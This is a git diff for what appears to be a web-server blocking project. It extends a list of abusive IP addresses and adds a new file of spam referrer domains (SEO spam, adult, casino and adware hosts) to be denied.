+8.221.141.145
+8.221.141.179
+8.221.141.224
+8.221.141.254
+8.221.141.33
+8.221.141.40
+8.221.142.108
+8.222.128.242
+8.222.141.245
+8.222.145.224
+8.222.151.87
+8.222.153.236
+8.222.157.113
+8.222.157.9
+8.222.161.10
+8.222.169.164
+8.222.173.158
+8.222.175.173
+8.222.175.60
+8.222.176.59
+8.222.180.199
+8.222.189.128
+8.222.190.223
+8.222.192.245
+8.222.194.224
+8.222.210.30
+8.222.224.174
+8.222.227.167
+8.222.230.242
+8.222.249.135
+8.222.250.138
+8.27.118.34
+80.103.63.114
+80.107.50.128
+80.11.52.240
+80.112.141.230
+80.13.153.140
+80.147.160.40
+80.167.238.44
+80.19.129.243
+80.203.14.201
+80.209.88.103
+80.213.65.8
+80.217.109.85
+80.227.99.162
+80.229.18.62
+80.233.77.125
+80.233.77.136
+80.234.105.211
+80.242.208.68
+80.243.10.238
+80.245.226.160
+80.245.49.46
+80.245.53.37
+80.251.218.164
+80.251.219.111
+80.253.31.232
+80.254.118.194
+80.51.121.56
+80.52.154.121
+80.66.75.106
+80.66.75.163
+80.66.75.57
+80.66.76.121
+80.66.77.15
+80.66.83.114
+80.66.83.225
+80.66.83.46
+80.67.167.81
+80.67.172.162
+80.67.208.99
+80.68.7.50
+80.80.88.66
+80.82.70.133
+80.82.77.139
+80.82.77.14
+80.82.77.202
+80.82.77.33
+80.89.193.5
+80.91.164.103
+80.91.21.96
+80.94.248.196
+80.94.92.124
+80.94.92.131
+80.94.92.134
+80.94.92.139
+80.94.92.14
+80.94.92.146
+80.94.92.151
+80.94.92.152
+80.94.92.153
+80.94.92.155
+80.94.92.156
+80.94.92.157
+80.94.92.158
+80.94.92.159
+80.94.95.215
+80.94.95.225
+80.94.95.239
+80.94.95.249
+80.94.95.81
+81.10.26.13
+81.12.30.24
+81.12.32.26
+81.13.62.77
+81.133.106.57
+81.16.170.117
+81.17.22.118
+81.170.214.174
+81.174.18.146
+81.174.41.1
+81.177.125.9
+81.177.139.201
+81.177.141.117
+81.181.65.130
+81.182.254.85
+81.19.137.146
+81.192.43.166
+81.192.46.38
+81.192.46.45
+81.192.46.48
+81.192.46.49
+81.192.87.130
+81.200.63.111
+81.209.147.8
+81.211.72.167
+81.227.20.25
+81.227.84.203
+81.229.51.9
+81.231.171.25
+81.235.245.35
+81.237.231.86
+81.24.135.200
+81.24.135.205
+81.241.81.54
+81.25.48.106
+81.255.58.121
+81.255.58.122
+81.26.241.96
+81.28.167.30
+81.30.162.18
+81.62.243.198
+81.68.110.60
+81.68.169.233
+81.68.75.162
+81.69.185.174
+81.69.197.181
+81.69.23.141
+81.69.247.233
+81.69.255.132
+81.70.117.182
+81.70.156.89
+81.70.166.44
+81.70.167.36
+81.70.186.78
+81.70.252.139
+81.70.254.209
+81.70.27.122
+81.70.4.105
+81.70.40.35
+81.70.94.21
+81.86.245.59
+81.94.83.39
+82.102.149.88
+82.102.27.163
+82.115.26.141
+82.119.109.156
+82.119.109.158
+82.129.230.162
+82.134.30.194
+82.137.193.252
+82.138.113.24
+82.147.91.10
+82.151.65.155
+82.156.123.122
+82.156.147.215
+82.156.177.193
+82.156.178.118
+82.156.184.42
+82.156.78.109
+82.157.138.113
+82.157.142.228
+82.157.161.129
+82.157.166.180
+82.157.193.14
+82.157.22.34
+82.157.238.134
+82.157.41.186
+82.157.52.140
+82.157.54.15
+82.157.63.72
+82.157.68.33
+82.165.198.169
+82.19.12.103
+82.193.109.199
+82.193.122.91
+82.196.3.179
+82.196.9.140
+82.197.71.235
+82.200.123.34
+82.200.161.178
+82.200.65.218
+82.202.180.132
+82.207.41.235
+82.207.8.154
+82.208.22.25
+82.208.65.46
+82.209.229.34
+82.38.0.154
+82.57.79.29
+82.64.186.234
+82.64.20.99
+82.64.49.122
+82.65.118.203
+82.65.175.65
+82.65.183.225
+82.66.104.17
+82.66.191.11
+82.67.7.178
+82.80.178.152
+82.84.122.203
+82.84.44.15
+82.96.134.57
+83.0.189.143
+83.114.50.87
+83.12.113.122
+83.131.34.225
+83.136.176.12
+83.149.178.13
+83.149.30.186
+83.150.218.171
+83.168.78.67
+83.171.110.159
+83.171.89.209
+83.209.18.18
+83.209.249.93
+83.21.96.157
+83.216.110.4
+83.222.190.106
+83.222.190.110
+83.222.190.114
+83.222.190.122
+83.222.190.194
+83.222.190.50
+83.222.190.58
+83.222.190.66
+83.222.190.82
+83.222.190.90
+83.222.190.94
+83.222.191.150
+83.222.191.46
+83.222.191.62
+83.222.191.90
+83.227.232.58
+83.229.124.190
+83.229.84.44
+83.233.30.104
+83.233.56.81
+83.235.16.111
+83.239.105.202
+83.239.148.54
+83.24.1.96
+83.254.151.136
+83.254.249.6
+83.254.250.21
+83.29.55.43
+83.50.160.63
+83.61.0.145
+83.77.160.242
+83.81.239.100
+83.97.73.239
+83.97.73.245
+83.97.73.40
+83.97.73.43
+84.15.129.3
+84.17.48.68
+84.2.230.37
+84.20.50.180
+84.210.4.116
+84.213.69.62
+84.221.31.75
+84.238.92.245
+84.239.45.19
+84.247.129.88
+84.247.172.240
+84.247.175.29
+84.247.181.144
+84.247.187.58
+84.247.191.24
+84.253.185.170
+84.33.132.66
+84.39.250.160
+84.42.247.102
+84.42.28.190
+84.43.41.96
+84.51.52.223
+84.52.103.234
+84.54.115.46
+84.54.183.32
+84.79.23.112
+85.103.101.183
+85.104.122.198
+85.105.50.6
+85.105.79.209
+85.109.234.32
+85.118.0.124
+85.119.122.23
+85.12.224.70
+85.130.141.191
+85.133.202.15
+85.133.202.89
+85.133.204.221
+85.133.216.253
+85.133.233.5
+85.133.247.145
+85.172.189.189
+85.18.236.229
+85.19.195.12
+85.190.242.220
+85.192.41.186
+85.192.56.68
+85.192.60.127
+85.192.60.154
+85.192.63.23
+85.195.24.13
+85.198.9.222
+85.198.9.25
+85.2.186.140
+85.206.76.77
+85.206.80.8
+85.206.91.51
+85.208.214.181
+85.208.96.195
+85.208.96.209
+85.208.96.212
+85.209.11.227
+85.209.11.254
+85.209.11.27
+85.209.11.98
+85.209.176.4
+85.215.189.51
+85.216.4.211
+85.221.48.115
+85.224.250.42
+85.226.230.93
+85.229.85.3
+85.237.36.102
+85.237.57.200
+85.239.244.253
+85.239.33.187
+85.239.33.196
+85.24.208.226
+85.24.208.234
+85.24.208.239
+85.24.208.245
+85.24.208.247
+85.24.208.249
+85.24.208.254
+85.24.230.215
+85.24.243.93
+85.244.96.116
+85.245.107.230
+85.247.2.222
+85.25.46.62
+85.252.10.186
+85.254.34.167
+85.69.178.104
+85.72.38.154
+85.8.183.125
+85.85.196.35
+85.9.102.65
+85.9.109.108
+86.104.194.13
+86.104.38.239
+86.107.7.242
+86.110.181.88
+86.121.254.225
+86.134.205.124
+86.138.9.98
+86.147.61.241
+86.161.0.196
+86.172.109.254
+86.48.0.235
+86.48.7.114
+86.48.7.244
+86.62.88.227
+86.65.168.139
+86.98.44.98
+86.99.59.82
+87.101.135.122
+87.101.201.178
+87.103.126.54
+87.107.104.228
+87.110.15.16
+87.120.166.192
+87.120.166.200
+87.121.54.230
+87.121.69.203
+87.121.77.235
+87.15.212.213
+87.154.183.26
+87.157.106.226
+87.158.156.33
+87.20.157.131
+87.200.141.77
+87.201.127.149
+87.201.166.171
+87.201.3.27
+87.202.162.65
+87.227.123.115
+87.227.38.138
+87.236.176.10
+87.236.176.109
+87.236.176.11
+87.236.176.110
+87.236.176.112
+87.236.176.115
+87.236.176.116
+87.236.176.12
+87.236.176.120
+87.236.176.122
+87.236.176.124
+87.236.176.127
+87.236.176.129
+87.236.176.13
+87.236.176.136
+87.236.176.137
+87.236.176.14
+87.236.176.140
+87.236.176.141
+87.236.176.143
+87.236.176.145
+87.236.176.148
+87.236.176.150
+87.236.176.154
+87.236.176.155
+87.236.176.157
+87.236.176.159
+87.236.176.16
+87.236.176.162
+87.236.176.164
+87.236.176.165
+87.236.176.167
+87.236.176.173
+87.236.176.174
+87.236.176.181
+87.236.176.184
+87.236.176.185
+87.236.176.188
+87.236.176.190
+87.236.176.195
+87.236.176.198
+87.236.176.199
+87.236.176.200
+87.236.176.201
+87.236.176.202
+87.236.176.203
+87.236.176.204
+87.236.176.206
+87.236.176.209
+87.236.176.21
+87.236.176.210
+87.236.176.211
+87.236.176.212
+87.236.176.213
+87.236.176.214
+87.236.176.215
+87.236.176.216
+87.236.176.22
+87.236.176.220
+87.236.176.222
+87.236.176.227
+87.236.176.231
+87.236.176.232
+87.236.176.237
+87.236.176.240
+87.236.176.241
+87.236.176.251
+87.236.176.253
+87.236.176.27
+87.236.176.28
+87.236.176.3
+87.236.176.32
+87.236.176.33
+87.236.176.37
+87.236.176.4
+87.236.176.40
+87.236.176.41
+87.236.176.42
+87.236.176.48
+87.236.176.5
+87.236.176.51
+87.236.176.52
+87.236.176.53
+87.236.176.54
+87.236.176.57
+87.236.176.59
+87.236.176.6
+87.236.176.60
+87.236.176.61
+87.236.176.62
+87.236.176.63
+87.236.176.65
+87.236.176.66
+87.236.176.67
+87.236.176.68
+87.236.176.69
+87.236.176.7
+87.236.176.70
+87.236.176.71
+87.236.176.74
+87.236.176.75
+87.236.176.78
+87.236.176.8
+87.236.176.80
+87.236.176.81
+87.236.176.82
+87.236.176.84
+87.236.176.88
+87.236.176.90
+87.236.176.92
+87.236.176.93
+87.236.176.97
+87.236.31.152
+87.248.1.199
+87.248.226.146
+87.255.193.50
+87.255.194.224
+87.26.27.156
+87.63.95.23
+87.76.54.139
+87.98.173.252
+88.129.112.118
+88.129.112.121
+88.129.112.124
+88.129.112.126
+88.129.112.43
+88.129.112.55
+88.129.112.59
+88.129.112.6
+88.129.243.87
+88.131.165.45
+88.142.46.185
+88.147.214.126
+88.147.214.143
+88.147.214.251
+88.149.190.217
+88.151.32.87
+88.175.186.160
+88.175.204.45
+88.178.146.254
+88.201.189.216
+88.202.237.119
+88.204.217.246
+88.205.172.170
+88.210.38.92
+88.214.25.16
+88.225.223.50
+88.247.149.40
+88.80.20.49
+88.83.53.177
+88.87.69.73
+89.108.108.98
+89.108.121.135
+89.109.1.211
+89.109.13.245
+89.109.233.181
+89.111.140.120
+89.136.213.186
+89.138.136.173
+89.150.146.124
+89.153.61.157
+89.154.72.49
+89.160.118.239
+89.163.148.212
+89.165.1.20
+89.165.1.200
+89.165.51.153
+89.181.149.95
+89.183.192.17
+89.183.192.96
+89.185.85.104
+89.185.85.253
+89.185.85.56
+89.187.171.147
+89.189.163.41
+89.190.156.198
+89.190.74.82
+89.190.78.82
+89.208.103.230
+89.208.104.113
+89.208.104.147
+89.208.104.95
+89.208.105.153
+89.208.105.222
+89.208.105.235
+89.208.105.254
+89.208.105.70
+89.208.106.189
+89.208.106.94
+89.208.107.170
+89.208.107.187
+89.208.107.9
+89.208.97.91
+89.208.97.92
+89.208.97.93
+89.216.47.154
+89.217.117.45
+89.218.185.66
+89.22.226.216
+89.22.229.203
+89.22.230.232
+89.234.157.254
+89.241.95.200
+89.248.162.149
+89.248.163.151
+89.248.163.197
+89.248.163.200
+89.248.163.205
+89.248.163.26
+89.248.163.34
+89.248.163.41
+89.248.163.73
+89.248.165.188
+89.248.165.195
+89.248.165.200
+89.248.165.203
+89.248.165.216
+89.248.167.131
+89.248.168.202
+89.248.168.74
+89.248.170.2
+89.248.172.16
+89.249.246.115
+89.251.47.179
+89.252.146.211
+89.252.153.168
+89.252.169.173
+89.252.190.72
+89.32.41.104
+89.35.14.168
+89.44.112.145
+89.44.47.158
+89.46.223.31
+89.46.223.32
+89.46.223.34
+89.46.223.35
+89.58.19.199
+89.58.26.216
+89.58.41.156
+89.97.218.142
+90.110.11.180
+90.151.171.106
+90.151.171.109
+90.160.139.163
+90.161.217.228
+90.176.67.60
+90.189.155.30
+90.225.32.79
+90.226.2.82
+90.228.209.191
+90.229.175.86
+90.239.30.219
+91.103.140.42
+91.103.252.1
+91.103.252.111
+91.103.252.144
+91.103.252.198
+91.103.252.47
+91.103.253.39
+91.103.253.62
+91.103.253.78
+91.114.30.138
+91.120.74.73
+91.121.110.55
+91.121.168.91
+91.121.2.118
+91.121.6.105
+91.122.177.94
+91.132.118.47
+91.132.144.59
+91.132.196.236
+91.134.243.207
+91.134.248.192
+91.134.248.249
+91.135.103.7
+91.144.158.231
+91.144.20.198
+91.147.101.41
+91.148.190.130
+91.148.190.174
+91.151.128.225
+91.151.88.144
+91.181.48.89
+91.185.41.33
+91.190.82.70
+91.191.209.202
+91.191.209.206
+91.196.164.156
+91.196.164.176
+91.202.233.20
+91.203.177.71
+91.205.128.170
+91.205.175.121
+91.205.219.185
+91.206.200.194
+91.206.200.73
+91.206.32.120
+91.207.115.249
+91.210.59.57
+91.212.166.37
+91.213.99.45
+91.223.169.83
+91.223.169.88
+91.226.42.131
+91.228.186.115
+91.232.120.102
+91.236.168.249
+91.237.163.35
+91.237.163.36
+91.237.163.37
+91.238.181.20
+91.238.181.21
+91.238.181.22
+91.238.181.33
+91.238.69.91
+91.239.19.66
+91.239.251.181
+91.241.150.246
+91.243.50.206
+91.243.82.59
+91.244.113.188
+91.244.171.40
+91.40.151.1
+91.72.148.106
+91.72.153.110
+91.73.195.46
+91.74.41.96
+91.74.46.237
+91.74.98.113
+91.75.1.20
+91.75.123.224
+91.75.14.80
+91.81.136.124
+91.84.54.24
+91.92.199.36
+91.92.240.245
+91.92.241.129
+91.92.241.176
+91.92.241.44
+91.92.244.113
+91.92.244.149
+91.92.244.236
+91.92.245.172
+91.92.245.242
+91.92.245.243
+91.92.245.245
+91.92.245.248
+91.92.246.216
+91.92.246.231
+91.92.247.200
+91.92.247.219
+91.92.249.129
+91.92.249.215
+91.92.250.101
+91.92.250.114
+91.92.250.242
+91.92.250.74
+91.92.250.95
+91.92.250.99
+91.92.251.164
+91.92.251.168
+91.92.251.235
+91.92.251.254
+91.92.255.189
+92.118.10.206
+92.118.39.100
+92.118.39.101
+92.118.39.115
+92.118.39.118
+92.118.39.119
+92.118.39.120
+92.118.39.133
+92.118.39.15
+92.118.39.152
+92.118.39.17
+92.118.39.202
+92.118.39.204
+92.118.39.205
+92.118.39.210
+92.118.39.244
+92.118.39.36
+92.118.39.37
+92.154.95.236
+92.174.91.201
+92.18.168.12
+92.191.96.185
+92.204.138.28
+92.204.139.118
+92.205.108.83
+92.205.182.254
+92.205.185.112
+92.205.19.74
+92.205.21.182
+92.205.25.199
+92.222.10.235
+92.222.177.43
+92.222.181.145
+92.222.181.7
+92.222.86.142
+92.246.139.107
+92.246.139.113
+92.246.84.133
+92.248.128.213
+92.249.48.213
+92.249.48.74
+92.255.195.59
+92.255.85.100
+92.26.0.203
+92.27.101.99
+92.27.157.252
+92.27.247.25
+92.33.220.122
+92.38.220.222
+92.52.165.208
+92.55.11.149
+92.55.190.215
+92.55.42.232
+92.60.70.236
+92.62.243.174
+92.63.197.192
+92.63.197.210
+92.63.206.71
+92.63.206.99
+92.87.22.210
+92.95.33.92
+92.97.113.43
+93.113.63.124
+93.113.63.8
+93.115.79.45
+93.118.106.118
+93.118.145.143
+93.120.240.202
+93.123.194.205
+93.145.62.142
+93.148.11.154
+93.157.106.243
+93.157.106.81
+93.157.174.208
+93.16.216.21
+93.171.80.87
+93.174.93.12
+93.174.95.106
+93.182.160.223
+93.184.42.238
+93.185.73.178
+93.190.225.213
+93.234.253.23
+93.30.25.125
+93.58.255.46
+93.84.100.70
+93.91.39.159
+93.95.231.14
+94.101.177.147
+94.102.49.119
+94.102.49.148
+94.102.49.190
+94.102.49.193
+94.102.49.238
+94.102.51.15
+94.102.51.218
+94.102.56.15
+94.102.56.29
+94.103.91.137
+94.127.212.198
+94.130.10.89
+94.131.211.168
+94.141.119.67
+94.141.120.113
+94.141.120.135
+94.141.120.143
+94.141.120.147
+94.141.120.155
+94.141.120.185
+94.141.120.187
+94.141.120.197
+94.141.120.203
+94.141.120.207
+94.141.120.34
+94.141.120.42
+94.141.120.58
+94.141.120.65
+94.141.120.77
+94.141.120.86
+94.141.120.99
+94.156.177.10
+94.156.177.100
+94.156.177.130
+94.156.177.20
+94.156.177.23
+94.156.177.24
+94.156.177.26
+94.156.177.4
+94.156.177.63
+94.156.177.68
+94.156.177.76
+94.156.177.77
+94.156.177.79
+94.156.177.83
+94.156.177.84
+94.156.177.89
+94.156.177.95
+94.156.64.112
+94.156.64.113
+94.156.64.55
+94.156.64.75
+94.156.64.79
+94.156.65.150
+94.156.65.153
+94.156.65.66
+94.156.66.102
+94.156.66.103
+94.156.66.106
+94.156.66.15
+94.156.66.165
+94.156.66.172
+94.156.66.196
+94.156.66.238
+94.156.66.252
+94.156.67.105
+94.156.68.162
+94.156.68.167
+94.156.68.237
+94.156.68.3
+94.156.69.197
+94.156.69.207
+94.156.69.219
+94.156.69.222
+94.156.69.227
+94.156.71.110
+94.156.71.15
+94.156.71.173
+94.156.71.233
+94.156.71.235
+94.156.71.239
+94.156.71.35
+94.156.71.8
+94.156.71.9
+94.16.121.226
+94.180.247.20
+94.181.95.145
+94.182.136.38
+94.19.176.212
+94.19.191.17
+94.190.83.164
+94.191.35.133
+94.20.183.126
+94.201.72.113
+94.202.159.145
+94.202.25.36
+94.204.100.38
+94.204.109.116
+94.204.194.75
+94.204.195.100
+94.204.45.174
+94.204.65.31
+94.204.89.163
+94.204.95.40
+94.205.115.126
+94.206.41.18
+94.207.16.191
+94.207.22.124
+94.228.162.29
+94.228.162.55
+94.228.163.98
+94.228.165.82
+94.228.169.65
+94.228.169.70
+94.228.169.73
+94.23.123.1
+94.23.149.213
+94.23.68.219
+94.230.208.147
+94.231.123.164
+94.231.192.184
+94.232.249.126
+94.232.42.99
+94.249.68.50
+94.253.67.54
+94.254.0.234
+94.254.63.17
+94.255.90.242
+94.33.59.31
+94.34.185.174
+94.59.200.137
+94.61.7.100
+94.63.229.20
+94.66.22.157
+94.66.67.141
+94.73.219.205
+94.76.82.57
+95.105.113.109
+95.111.253.31
+95.128.43.164
+95.130.227.206
+95.134.31.13
+95.141.228.9
+95.142.115.23
+95.142.90.214
+95.160.47.156
+95.161.170.86
+95.164.10.80
+95.167.225.76
+95.173.191.84
+95.173.2.140
+95.174.114.92
+95.174.124.39
+95.181.86.2
+95.188.146.10
+95.188.64.5
+95.21.51.32
+95.214.27.14
+95.214.27.166
+95.214.27.168
+95.214.27.169
+95.214.27.170
+95.214.27.246
+95.214.27.27
+95.214.27.29
+95.214.27.30
+95.214.27.31
+95.214.27.32
+95.214.27.38
+95.214.27.40
+95.214.27.41
+95.214.52.167
+95.214.53.45
+95.214.55.138
+95.217.109.26
+95.221.228.130
+95.248.125.43
+95.255.108.3
+95.31.15.104
+95.46.34.235
+95.47.242.22
+95.52.11.27
+95.57.207.100
+95.58.255.251
+95.64.136.246
+95.78.169.95
+95.79.108.51
+95.8.26.182
+95.81.93.99
+95.85.112.170
+95.85.45.45
+95.85.56.9
+95.85.93.33
+95.87.225.236
+95.87.246.71
+95.87.248.223
+95.9.80.159
+95.9.93.130
+95.90.242.212
+96.1.40.151
+96.10.144.195
+96.126.98.234
+96.21.40.134
+96.232.248.246
+96.235.27.111
+96.43.52.87
+96.46.27.115
+96.60.188.235
+96.67.59.65
+96.77.117.189
+96.78.175.36
+96.78.175.45
+96.84.198.29
+96.87.134.246
+96.88.153.181
+97.103.199.32
+97.104.82.254
+97.107.133.213
+97.70.129.101
+97.74.83.185
+97.74.85.237
+97.74.87.44
+97.74.95.243
+97.86.134.216
+97.91.242.161
+98.10.121.246
+98.102.148.242
+98.113.203.148
+98.128.254.210
+98.13.132.182
+98.14.144.113
+98.142.142.192
+98.165.121.125
+98.17.123.48
+98.184.108.60
+98.242.210.175
+98.27.189.28
+98.30.164.118
+98.47.116.86
+98.96.193.10
+98.96.193.11
+98.96.193.12
+98.96.193.13
+98.96.193.2
+98.96.193.26
+98.96.193.4
+98.96.193.6
+98.97.53.14
diff --git a/db/bad-referrers.txt b/db/bad-referrers.txt
new file mode 100644
index 00000000..75f087ff
--- /dev/null
+++ b/db/bad-referrers.txt
@@ -0,0 +1,7105 @@
+000free.us
+007angels.com
+00author.com
+00go.com
+00it.com
+00webcams.com
+01apple.com
+03e.info
+03p.info
+08800.top
+0912701309f8ce.com
+0c47f8422d3f.com
+0daymusic.org
+0lovespells0.blogspot.com
+0n-line.tv
+1-99seo.com
+1-free-share-buttons.com
+1000n1.ru
+1001desert.com
+1001watch.com.ua
+1008.su
+100dollars-seo.com
+100searchengines.com
+101billion.com
+101flag.ru
+101lesbian.xyz
+101raccoon.ru
+108shot.com
+10bet.com
+11235813.webzdarma.cz
+11pikachu.ru
+123any.com
+123cha.com
+123kuma.com
+123locker.com
+123movies.love
+12bet.com
+12masterov.com
+12u.info
+1314dh.com
+13tabs.com
+14b.info
+1688.com
+178evakuator178.ru
+18ps.ru
+1adult.com
+1bet.com
+1flag.co.za
+1hwy.com
+1j7740kd.website
+1kdailyprofit.me
+1kinobig.ru
+1millionusd.xyz
+1pamm.ru
+1qingdao.com
+1stat.ru
+1webmaster.ml
+1xbet4you.com
+2000k.ru
+2015god.org
+2020iscoming.info
+202ch.com
+20pascals.nl
+214jaluwobapef.cf
+21h2o.com
+2345.com
+23kw.ru
+24-ak.ru
+24videos.tv
+24x7-server-support.site
+256bit.by
+2728fb936f0.com
+273-fz.ru
+28n2gl3wfyb0.ru
+2ads.co.uk
+2daytrendingnews.com
+2drittel.de
+2girls1cup-free.com
+2itech.ru
+2kata.ru
+2nt.ru
+2pxg8bcf.top
+2rich4bitches.com
+2x2fan.ru
+3-letter-domains.net
+300richmond.co.nz
+34.gs
+3dracergames.com
+3rbseyes.com
+3th.co.in
+3w24.com
+3weekdiet.com
+3xforum.ro
+404.mn
+40cg.com
+45en.ru
+4inn.ru
+4istoshop.com
+4k-player.pl
+4kepics.com
+4kpics.rocks
+4kplayer.pl
+4pp13.com
+4rent.ru
+4replicawatch.net
+4senses.co
+4ur.click
+4ureyesonly.com
+4webmasters.com
+4webmasters.org
+5-steps-to-start-business.com
+5000-cotydzien.com
+51.la
+51unlim.ru
+55wmz.ru
+57883.net
+5elementov.ru
+5forex.ru
+5i2.net
+5kstore.com
+5tey7463.weebly.com
+5u.com
+5ws.dating-app.ru
+6128786.com
+66cpwgln.space
+6hopping.com
+70casino.online
+72-news.com
+76brighton.co.uk
+777-club.ru
+7a2rnuey1tw9ar.ru
+7fon.ru
+7makemoneyonline.com
+7minuteworkout.com
+7ooo.ru
+7search.com
+7wind.ru
+7xc4n.com
+7yue.org
+7zap.com
+83net.jp
+8558l.jobs.net
+883zy.com
+888.com
+8gold.com
+8jn.dating-app.ru
+8kisses.eu
+8lufu.com
+8si.ru
+8xv8.com
+91abcw.com
+98oi.ru
+991mostfm.co.id
+999webdesign.com
+9icmzvn6.website
+9med.net
+DomainStatsBot
+a.frcls.fr
+a.pr-cy.ru
+a14download.com
+a1security.com.ua
+a96527gi.beget.tech
+aa08daf7e13b6345e09e92f771507fa5f4.com
+aa14ab57a3339c4064bd9ae6fad7495b5f.com
+aa625d84f1587749c1ab011d6f269f7d64.com
+aa81bf391151884adfa3dd677e41f94be1.com
+aa8780bb28a1de4eb5bff33c28a218a930.com
+aa8b68101d388c446389283820863176e7.com
+aa9bd78f328a6a41279d0fad0a88df1901.com
+aa9d046aab36af4ff182f097f840430d51.com
+aaa38852e886ac4af1a3cff9b47cab6272.com
+aab94f698f36684c5a852a2ef272e031bb.com
+aac500b7a15b2646968f6bd8c6305869d7.com
+aac52006ec82a24e08b665f4db2b5013f7.com
+aad1f4acb0a373420d9b0c4202d38d94fa.com
+aadroid.net
+aanapa.ru
+aarbur.com
+aaronabel.com
+aasoldes.fr
+abbanreddy.com
+abcdefh.xyz
+abcdeg.xyz
+abcguru.xyz
+abclauncher.com
+abctoppictures.net
+abiente.ru
+above.com
+abovetherivernc.com
+absolute-s.ru
+absolutelyanalog.com
+absugars.com
+abtasty.com
+abusora.com
+abwa.tk
+academia-nsk.org
+academiacsmendoza.org
+acads.net
+acc.eu.org
+accessoires-mode.in
+acgs.tk
+acheterviagrafr24.com
+acmebtn.ml
+acortarurl.es
+actices.com
+actionnooz.com
+activecampaign.dreamhosters.com
+activepr.ru
+actulite.com
+acunetix-referrer.com
+ad-words.ru
+adamoads.com
+adanih.com
+adbetclickin.pink
+adcash.com
+adclickservice.com
+adclickthru.net
+adconscious.com
+add-add.men
+addbin.men
+addblueoff.com.ua
+addray.pro
+addtoadd.men
+adelly.bg
+adexprts.com
+adf.ly
+adhome.biz
+adidas.frwebs.fr
+adimmix.com
+adinterax.com
+adktrailmap.com
+adloads.com
+adloads.net
+adman.gr
+adman.se
+admanaerofoil.com
+admatic.com.tr
+admeasures.com
+adminshop.com
+admitad.com
+adnotbad.com
+adobereader-free.ru
+adpremium.org
+adprotect.net
+adrenalin-stk.ru
+adrunnr.com
+ads-cool.pro
+ads-seo.men
+ads.gold
+ads.tremorhub.com
+adserver-e7.com
+adservme.com
+adsfresh.men
+adsland.men
+adsloads.com
+adsref.men
+adssafeprotected.com
+adtech.de
+adtech.fr
+adtech.us
+adtiger.tk
+adtology.com
+adult-shop.com.ua
+adult3dgames.com
+adultactioncam.com
+adultfriendfinder.com
+adultfullhd.com
+adultgalls.com
+adultmeetonline.info
+adultnet.in
+adultwebhosting.info
+advancedcleaner.com
+advancedmassagebysara.com
+advancedsoftwaresupport.com
+adventureparkcostarica.com
+adverster.com
+advertex.info
+advertisingtag.net
+adviceforum.info
+advocatemsk.ru
+advokat-grodno.by
+advokateg.ru
+advokateg.xyz
+adzerg.com
+adzpower.com
+aero2.ru
+aerogo.com
+affiliate-fr.com
+affordablewebsitesandmobileapps.com
+affrh2015.com
+afftrack001.com
+afmuseum.com
+afora.ru
+afslankpillen2017nl.eu
+agadelha.com.br
+agahinameh.com
+agapovdg.ru
+agardomains.com
+agecheckadult.com
+ageofclones.com
+aghanyna.com
+agreda.pluto.ro
+agroeconom.kz
+agysya.ru
+ahhjf.com
+ahmedabadwebs.com
+ahrefs.com
+ahrntal.verymes.xyz
+aibolita.com
+aihelen.net
+aimayangzhi.com
+air-edem.ru
+airlandsea.info
+airmaxshoes-2016.com
+akama.com
+akita.kz
+aksonural.ru
+aktivator-windows10.blogspot.com
+aktobe.xkaz.org
+akuhni.by
+akusherok.ru
+akvamaster.dp.ua
+alarmobninsk.ru
+albamargroup.com
+alborzan.com
+albumsuper.info
+albuteroli.com
+ald2014.org
+alekseevec.ru
+alert-fdm.xyz
+alert-fjg.xyz
+alert-hgd.xyz
+alert-jdh.xyz
+alert.scansafe.net
+alessandraleone.com
+alevinefesleri.com
+alf-img.com
+alfa-img.com
+alfa-medosmotr.ru
+alfa9.com
+alfabot.xyz
+alfapro.ru
+algarveglobal.com
+algerianembassy.co.in
+alibestsale.com
+alice.it
+alienwheel.es
+alienwheels.de
+aliexpresscashback.club
+alif-ba-ta.com
+alive-ua.com
+alkoravto.ru
+all-number.com
+all-streaming-media.com
+all4invest.info
+all4invest.ru
+all4wap.ru
+allbizne.co.ua
+allblogroll.com
+allboard.xobor.de
+allcredits.su
+alldezservice.kz
+alldownload.pw
+alldubai.biz
+allesohnegirls.net
+allfinweb.com
+allforminecraft.ru
+allknow.info
+allkrim.com
+allmarketsnewdayli.gdn
+allnews.md
+allnews24.in
+allornamenti.com
+alloysteel.ru
+allpdfmags.net
+allproblog.com
+allsilver925.co.il
+allstatesugarbowl.org
+alltheviews.com
+allwidewallpapers.com
+allwomen.info
+aloofly.com
+alot.com
+alphacarolinas.com
+alphaforum.ru
+alphahoverboards.com
+alpharma.net
+alphavisions.net
+alpinism.ru
+alt-servis.ru
+alta-realestate.com
+altamayoztourism.com
+aludecor.info
+alveris.ru
+alvtank.se
+alyeskaresort.com
+am-se.com
+am15.net
+amanda-porn.ga
+amateurgalls.com
+amateurlivechat.org
+amateurmatch.com
+amazingninja.com
+amazingpic.net
+amazon-adsystem.com
+amazon-seo-service.com
+ameblo.jp
+ameblo.top
+amehdaily.com
+amigobulls.com
+amoi.tn
+amospalla.es
+ample-awards-today.us
+ampower.me
+amt-k.ru
+amung.us
+amyfoxfitness.com
+an-donut.com
+anabolics.shop
+anaksma.info
+anal-acrobats.com
+anal-acrobats.hol.es
+analnoeporno.tv
+analytics-ads.xyz
+ananumous.ru
+anapa-inns.ru
+anaseracresar.tk
+anatomiy.com
+andpolice.com
+android-style.com
+android-systems.ru
+android-vsem.org
+android4fun.org
+androids-store.com
+angel1777.kz
+angigreene.com
+angkortours.vn
+angry-fermi-7633.arukascloud.io
+animal-drawings.com
+animal36.com
+animali.deagostinipassion.it
+animalia-life.club
+animalrank.com
+animaltoplist.com
+anime.dougasouko.com
+animebox.com.ua
+animenime.ru
+anjalika.co.in
+anlimebel.kiev.ua
+anmysite.com
+anniemation.com
+anonymizeme.pro
+anonymous-redirect.com
+anonymousfox.co
+anti-virus-removal.info
+anticrawler.org
+antons-transporte.de
+aosexkontakte.net
+aosheng-tech.com
+ap.senai.br
+apartamentwroclaw.eu
+apartment.ru
+apartmentbay.ru
+apartmentratings.com
+apccargo.com
+apelsinnik.website
+apessay.com
+api.stathat.com
+apiadanaknet-a.akamaihd.net
+apiallgeniusinfo-a.akamaihd.net
+apiappenableinfo-a.akamaihd.net
+apibatbrowsecom-a.akamaihd.net
+apibetweenlinesn-a.akamaihd.net
+apibrowsesmartne-a.akamaihd.net
+apidiamondatanet-a.akamaihd.net
+apidigidocketnet-a.akamaihd.net
+apifasterlightin-a.akamaihd.net
+apiholdingmypage-a.akamaihd.net
+apiitsthirteende-a.akamaihd.net
+apilinkswiftco-a.akamaihd.net
+apiluckyleapnet-a.akamaihd.net
+apimegabrowsebiz-a.akamaihd.net
+apimossnetinfo-a.akamaihd.net
+apimountainbikei-a.akamaihd.net
